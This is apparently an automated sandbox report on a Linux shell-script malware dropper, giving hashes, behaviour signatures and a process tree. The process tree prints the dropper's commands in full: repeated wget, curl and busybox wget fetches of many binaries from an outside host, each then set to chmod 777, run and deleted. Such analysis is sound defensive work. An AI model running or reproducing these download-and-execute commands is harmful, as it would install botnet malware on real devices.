Analysis
-
max time kernel
88s -
max time network
90s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
25/10/2024, 01:10
Static task
static1
Behavioral task
behavioral1
Sample
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh
-
Size
10KB
-
MD5
ae125d61416f00e8ab77c13b1c87f06f
-
SHA1
a50cea28aa988684f1d031bd2504e6306371bd65
-
SHA256
15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a
-
SHA512
762c6ad0536b762a73b4963dd635b801bada9f095ac7fbcb3ff72a12c880666640bab1383c1ad21571f47c02ddf9e0a832963df51ed819276b7dd8269e26830e
-
SSDEEP
192:Nr345Rs+M0oTailh1+HPCegD5BMzv2h1+HPd0oTaiB5BMzvar345Rx:Nr345Rs+M0oTaiJegD5BMzvR0oTaiB5e
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1002 chmod 735 chmod 772 chmod 876 chmod 932 chmod 742 chmod 904 chmod 911 chmod 939 chmod 946 chmod 967 chmod 749 chmod 869 chmod 890 chmod 803 chmod 918 chmod 988 chmod 960 chmod 815 chmod 897 chmod 925 chmod 953 chmod 974 chmod 848 chmod 822 chmod 883 chmod 981 chmod 995 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf 736 V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf /tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n 743 4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n /tmp/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR 750 JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR /tmp/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ 773 r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ /tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya 804 KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya /tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 816 QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 /tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr 823 J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr /tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO 849 gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO /tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 870 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 /tmp/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y 877 2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y /tmp/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr 884 PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr /tmp/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g 891 ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g /tmp/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR 898 Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR /tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv 905 EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv /tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO 912 gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO /tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya 919 KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya /tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 926 QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 /tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr 933 J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr /tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv 940 EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv /tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 947 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 /tmp/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y 954 2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y /tmp/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr 961 PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr /tmp/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g 968 ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g /tmp/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR 975 Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR /tmp/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR 982 JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR /tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf 989 V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf /tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n 996 4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n /tmp/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ 1003 r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 882 busybox 893 wget 984 wget 712 wget 724 curl 873 curl 903 busybox 922 curl 938 busybox 818 wget 834 curl 868 busybox 886 wget 936 curl 964 curl 785 curl 889 busybox 945 busybox 957 curl 963 wget 977 wget 985 curl 741 busybox 809 wget 825 wget 908 curl 921 wget 950 curl 987 busybox 980 busybox 794 busybox 819 curl 860 curl 880 curl 896 busybox 900 wget 943 curl 999 curl 970 wget 746 curl 748 busybox 757 curl 973 busybox 914 wget 971 curl 991 wget 752 wget 887 curl 1001 busybox 843 busybox 915 curl 966 busybox 739 curl 821 busybox 872 wget 924 busybox 994 busybox 766 busybox 778 wget 814 busybox 875 busybox 879 wget 929 curl 992 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR curl File opened for modification /tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr curl File opened for modification /tmp/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g curl File opened for modification /tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya curl File opened for modification /tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 curl File opened for modification /tmp/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ curl File opened for modification /tmp/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR curl File opened for modification /tmp/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR curl File opened for modification /tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n curl File opened for modification /tmp/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr curl File opened for modification /tmp/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ curl File opened for modification /tmp/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr curl File opened for modification /tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv curl File opened for modification /tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya curl File opened for modification /tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7 curl File opened for modification /tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n curl File opened for modification /tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 curl File opened for modification /tmp/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g curl File opened for modification /tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO curl File opened for modification /tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO curl File opened for modification /tmp/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR curl File opened for modification /tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf curl File opened for modification /tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv curl File opened for modification /tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74 curl File opened for modification /tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf curl File opened for modification /tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr curl File opened for modification /tmp/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y curl File opened for modification /tmp/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y curl
Processes
-
/tmp/15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh/tmp/15b0752bf0316b73d6e514baf006cd60fc4668e67b565151f619655d19fd435a.sh1⤵PID:702
-
/bin/rm/bin/rm bins.sh2⤵PID:709
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- System Network Configuration Discovery
PID:712
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:724
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵PID:733
-
-
/bin/chmodchmod 777 V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf./V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵PID:737
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵PID:738
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- System Network Configuration Discovery
PID:741
-
-
/bin/chmodchmod 777 4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n./4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm 4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵PID:744
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵PID:745
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- System Network Configuration Discovery
PID:748
-
-
/bin/chmodchmod 777 JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR./JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵PID:751
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- System Network Configuration Discovery
PID:752
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- System Network Configuration Discovery
PID:766
-
-
/bin/chmodchmod 777 r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ./r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- Executes dropped EXE
PID:773
-
-
/bin/rmrm r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵PID:777
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- System Network Configuration Discovery
PID:778
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:785
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- System Network Configuration Discovery
PID:794
-
-
/bin/chmodchmod 777 KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya./KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- Executes dropped EXE
PID:804
-
-
/bin/rmrm KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵PID:807
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- System Network Configuration Discovery
PID:809
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- System Network Configuration Discovery
PID:814
-
-
/bin/chmodchmod 777 QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7./QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵PID:817
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- System Network Configuration Discovery
PID:818
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- System Network Configuration Discovery
PID:821
-
-
/bin/chmodchmod 777 J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr./J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵PID:824
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- System Network Configuration Discovery
PID:825
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:834
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- System Network Configuration Discovery
PID:843
-
-
/bin/chmodchmod 777 gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO./gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵PID:852
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵PID:853
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:860
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- System Network Configuration Discovery
PID:868
-
-
/bin/chmodchmod 777 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74./0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵PID:871
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- System Network Configuration Discovery
PID:872
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- System Network Configuration Discovery
PID:875
-
-
/bin/chmodchmod 777 2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y./2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm 2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵PID:878
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- System Network Configuration Discovery
PID:879
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- System Network Configuration Discovery
PID:882
-
-
/bin/chmodchmod 777 PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr./PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵PID:885
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- System Network Configuration Discovery
PID:886
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- System Network Configuration Discovery
PID:889
-
-
/bin/chmodchmod 777 ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g./ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵PID:892
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- System Network Configuration Discovery
PID:893
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- System Network Configuration Discovery
PID:896
-
-
/bin/chmodchmod 777 Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR./Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵PID:899
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- System Network Configuration Discovery
PID:900
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- System Network Configuration Discovery
PID:903
-
-
/bin/chmodchmod 777 EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv./EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵PID:906
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵PID:907
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵PID:910
-
-
/bin/chmodchmod 777 gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO./gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm gYFWXZWb2xjjt0xGogYTHbY0YGBeazLzrO2⤵PID:913
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- System Network Configuration Discovery
PID:914
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵PID:917
-
-
/bin/chmodchmod 777 KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya./KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm KqF8ue89s0dQzwznmmLvDTVgsN6TrBaDya2⤵PID:920
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- System Network Configuration Discovery
PID:921
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- System Network Configuration Discovery
PID:924
-
-
/bin/chmodchmod 777 QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W7./QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm QD1Q2i43s6YpFBOgEzgrztjCHed6Tjd0W72⤵PID:927
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵PID:928
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵PID:931
-
-
/bin/chmodchmod 777 J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr./J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm J9ZBT3LwkPmcOu8uTAHFx2aVSu2mBY1QTr2⤵PID:934
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵PID:935
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:936
-
-
